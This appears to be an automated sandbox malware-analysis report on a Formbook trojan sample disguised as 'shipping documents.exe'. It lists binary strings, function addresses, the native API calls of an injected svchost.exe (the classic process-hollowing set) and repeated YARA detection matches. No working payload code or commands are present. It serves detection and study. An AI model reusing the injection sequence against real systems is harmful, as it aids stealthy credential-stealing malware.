Source: shipping documents.exe, 00000000.00000000.2055089527.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4af1e1c5-2
Source: shipping documents.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_83c66a0f-c
Source: shipping documents.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c16c0f17-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: shipping documents.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042AFF3 NtClose,	2_2_0042AFF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72B60 NtClose,LdrInitializeThunk,	2_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_02F72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_02F72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,	2_2_02F735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F74340 NtSetContextThread,	2_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F74650 NtSuspendThread,	2_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AF0 NtWriteFile,	2_2_02F72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AD0 NtReadFile,	2_2_02F72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AB0 NtWaitForSingleObject,	2_2_02F72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BF0 NtAllocateVirtualMemory,	2_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BE0 NtQueryValueKey,	2_2_02F72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BA0 NtEnumerateValueKey,	2_2_02F72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72B80 NtQueryInformationFile,	2_2_02F72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72EE0 NtQueueApcThread,	2_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72EA0 NtAdjustPrivilegesToken,	2_2_02F72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72E80 NtReadVirtualMemory,	2_2_02F72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72E30 NtWriteVirtualMemory,	2_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FE0 NtCreateFile,	2_2_02F72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FB0 NtResumeThread,	2_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FA0 NtQuerySection,	2_2_02F72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F90 NtProtectVirtualMemory,	2_2_02F72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F60 NtCreateProcessEx,	2_2_02F72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F30 NtCreateSection,	2_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CF0 NtOpenProcess,	2_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CC0 NtQueryVirtualMemory,	2_2_02F72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CA0 NtQueryInformationToken,	2_2_02F72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C60 NtCreateKey,	2_2_02F72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C00 NtQueryInformationProcess,	2_2_02F72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DD0 NtDelayExecution,	2_2_02F72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DB0 NtEnumerateKey,	2_2_02F72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D30 NtUnmapViewOfSection,	2_2_02F72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D10 NtMapViewOfSection,	2_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D00 NtSetInformationFile,	2_2_02F72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73090 NtSetValueKey,	2_2_02F73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73010 NtOpenDirectoryObject,	2_2_02F73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F739B0 NtGetContextThread,	2_2_02F739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73D70 NtOpenThread,	2_2_02F73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73D10 NtOpenProcessToken,	2_2_02F73D10

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006B4021: CreateFileW,DeviceIoControl,CloseHandle,

0_2_006B4021

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_006A8858

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006B545F

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0065E800	0_2_0065E800
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0067DBB5	0_2_0067DBB5
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0065E060	0_2_0065E060
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006D804A	0_2_006D804A
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00664140	0_2_00664140
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00672405	0_2_00672405
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00686522	0_2_00686522
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006D0665	0_2_006D0665
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0068267E	0_2_0068267E
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00666843	0_2_00666843
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0067283A	0_2_0067283A
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006889DF	0_2_006889DF
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00668A0E	0_2_00668A0E
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006D0AE2	0_2_006D0AE2
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00686A94	0_2_00686A94
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006AEB07	0_2_006AEB07
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006B8B13	0_2_006B8B13
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0067CD61	0_2_0067CD61
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00687006	0_2_00687006
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0066710E	0_2_0066710E
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00663190	0_2_00663190
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00651287	0_2_00651287
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006733C7	0_2_006733C7
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0067F419	0_2_0067F419
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006716C4	0_2_006716C4
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00665680	0_2_00665680
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006658C0	0_2_006658C0
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006778D3	0_2_006778D3
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00671BB8	0_2_00671BB8
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00689D05	0_2_00689D05
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0065FE40	0_2_0065FE40
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0067BFE6	0_2_0067BFE6
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00671FD0	0_2_00671FD0
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_03BA3630	0_2_03BA3630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004011C0	2_2_004011C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004021A5	2_2_004021A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004021B0	2_2_004021B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FACB	2_2_0040FACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FAD3	2_2_0040FAD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402320	2_2_00402320
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004023BC	2_2_004023BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D443	2_2_0042D443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416433	2_2_00416433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FCF3	2_2_0040FCF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DD73	2_2_0040DD73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F50	2_2_00402F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC02C0	2_2_02FC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030003E6	2_2_030003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA352	2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030001AA	2_2_030001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF81CC	2_2_02FF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF41A2	2_2_02FF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC8158	2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30100	2_2_02F30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5C6E0	2_2_02F5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3C7C0	2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64750	2_2_02F64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEE4F6	2_2_02FEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03000591	2_2_03000591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF2446	2_2_02FF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE4420	2_2_02FE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF6BD7	2_2_02FF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFAB40	2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E8F0	2_2_02F6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F268B8	2_2_02F268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300A9A6	2_2_0300A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4A840	2_2_02F4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F42840	2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFEEDB	2_2_02FFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52E90	2_2_02F52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFCE93	2_2_02FFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40E59	2_2_02F40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFEE26	2_2_02FFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4CFE0	2_2_02F4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32FC8	2_2_02F32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBEFA0	2_2_02FBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4F40	2_2_02FB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60F30	2_2_02F60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE2F30	2_2_02FE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F82F28	2_2_02F82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30CF2	2_2_02F30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0CB5	2_2_02FE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40C00	2_2_02F40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3ADE0	2_2_02F3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F58DBF	2_2_02F58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDCD1F	2_2_02FDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4AD00	2_2_02F4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE12ED	2_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5B2C0	2_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F452A0	2_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F8739A	2_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2D34C	2_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF132D	2_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF70E9	2_2_02FF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF0E0	2_2_02FFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEF0CC	2_2_02FEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F470C0	2_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300B16B	2_2_0300B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4B1B0	2_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2F172	2_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7516C	2_2_02F7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF16CC	2_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F85630	2_2_02F85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF7B0	2_2_02FFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F31460	2_2_02F31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF43F	2_2_02FFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030095C3	2_2_030095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDD5B0	2_2_02FDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7571	2_2_02FF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEDAC6	2_2_02FEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDDAAC	2_2_02FDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F85AA0	2_2_02F85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE1AA3	2_2_02FE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB3A6C	2_2_02FB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFA49	2_2_02FFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7A46	2_2_02FF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB5BF0	2_2_02FB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7DBF9	2_2_02F7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5FB80	2_2_02F5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFB76	2_2_02FFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F438E0	2_2_02F438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAD800	2_2_02FAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F49950	2_2_02F49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5B950	2_2_02F5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD5910	2_2_02FD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F49EB0	2_2_02F49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F03FD2	2_2_02F03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F03FD5	2_2_02F03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFFB1	2_2_02FFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F41F92	2_2_02F41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFF09	2_2_02FFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFCF2	2_2_02FFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB9C32	2_2_02FB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5FDC0	2_2_02F5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7D73	2_2_02FF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF1D5A	2_2_02FF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F43D40	2_2_02F43D40
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_062A1266	3_2_062A1266
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_062A125F	3_2_062A125F

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: String function: 00670D27 appears 70 times
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: String function: 00657F41 appears 36 times
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: String function: 00678B40 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F2B970 appears 280 times

Source: shipping documents.exe, 00000000.00000003.2066595265.0000000003F1D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping documents.exe
Source: shipping documents.exe, 00000000.00000003.2066839742.0000000003D73000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping documents.exe

Source: shipping documents.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2282609393.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4517885588.0000000006290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4517885588.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2282609393.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/11

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006BA2D5 GetLastError,FormatMessageW,

0_2_006BA2D5

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006A8713 AdjustTokenPrivileges,CloseHandle,		0_2_006A8713
